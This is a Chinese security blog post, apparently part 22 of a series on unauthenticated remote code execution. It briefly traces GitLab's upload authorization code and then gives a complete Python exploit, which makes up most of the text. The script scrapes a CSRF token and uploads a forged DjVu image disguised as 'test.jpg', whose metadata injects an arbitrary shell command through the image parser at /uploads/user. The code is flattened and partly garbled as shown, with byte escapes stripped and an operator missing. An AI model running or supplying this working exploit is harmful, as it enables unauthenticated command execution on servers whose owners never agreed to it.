安全RCE之未授权访问分析(22)

authorize定义位于app/controllers/concerns/uploads_actions.rb。代码如下：
def authorize set_workhorse_internal_api_content_type authorized = uploader_class.workhorse_authorize( has_length: false, maximum_size: Gitlab::CurrentSettings.max_attachment_size.megabytes.to_i) render json: authorized def model strong_memoize(:model) { find_model } end
在UploadsController中要调用到还需要先执行前面定义的指定的方法authorize_create_access!和verify_workhorse_api!。一个用于验证上传权限，一个用于检测请求jwt的部分保证来自workhorse。首先使用exp进行测试，代码如下：
import sysimport requestsfrom bs4 import BeautifulSouprequests.packages.urllib3.disable_warnings()def EXP(url, command): session = requests.Session() proxies = { "http": "127.0.0.1:8080", "https": "127.0.0.1:8080" } try: r = session.get(url.strip("/") "/users/sign_in", verify=False) soup = BeautifulSoup(r.text, features="lxml") token = soup.findAll("meta")[16].get("content") data = " ------WebKitFormBoundaryIMv3mxRg59TkFSX5 Content-Disposition: form-data; name="file"; filename="test.jpg" Content-Type: image/jpeg AT&TFORMx00x00x03xafDJVMDIRMx00x00x00.x81x00x02x00x00x00Fx00x00x00xacxffxffxdexbfx99 !xc8x91Nxebx0cx07x1fxd2xdax88xe8kxe6Dx0f,qx02xeeIxd3nx95xbdxa2xc3"?FORMx00x00x00^DJVUINFOx00x00x00 x00x08x00x08x18x00dx00x16x00INCLx00x00x00x0fshared_anno.iffx00BG44x00x00x00x11x00Jx01x02x00x08x00x08x8axe6xe1xb17xd9*x89x00BG44x00x00x00x04x01x0fxf9x9fBG44x00x00x00x02x02 FORMx00x00x03x07DJVIANTax00x00x01P(metadata (Copyright " " . qx{" command "} . " b ") ) ------WebKitFormBoundaryIMv3mxRg59TkFSX5-- " headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "Connection": "close", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} flag = "Failed to process image" req = session.post(url.strip("/") "/uploads/user", data=data, headers=headers, verify=False) x = req.text if flag in x: print("success!!!") else: print("No Vuln!!!") except Exception as e: print(e)if __name__ == "__main__": EXP(sys.argv[1], sys.argv[2])